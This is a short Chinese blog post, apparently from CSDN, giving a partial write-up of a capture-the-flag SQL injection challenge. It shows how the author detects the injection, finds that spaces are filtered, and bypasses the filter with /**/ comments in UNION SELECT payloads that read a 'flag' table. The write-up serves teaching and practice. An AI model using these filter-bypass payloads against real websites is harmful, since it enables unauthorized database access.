实验吧web之简单的sql注入1

0x.部分题解

一、通过加英文单引号1 ,检测到存在注入:   php?id=1

 

二、按常规步骤输入1 and 1=11 and 1=2的时候,发现报了“SQLi deteced!”而无法查询:php?1 and 1=1  php?1 and 1=2

 

    那么,去掉空格输入1and1=11and1=2呢?

 

    确定是过滤了空格

三、绕过过滤空格的进行手工注入,常用一对英文括号()或者程序中常用的一对注释符/**/来替代空格。

   


四、输入1/**/union/**/select/**/flag/**/from/**/flag/**/where/**/1=1,顺利输出预期结果:

      【至于字段flag和表flag就是纯粹猜测的】


五、加单引号闭合,执行:

        1'/**/union/**/select/**/flag/**/from/**/flag/**/where/**/'1'='1




发布了84 篇原创文章 · 获赞 30 · 访问量 7万+
展开阅读全文

没有更多推荐了,返回首页

©️2019 CSDN 皮肤主题: 大白 设计师: CSDN官方博客

分享到微信朋友圈

×

扫一扫,手机浏览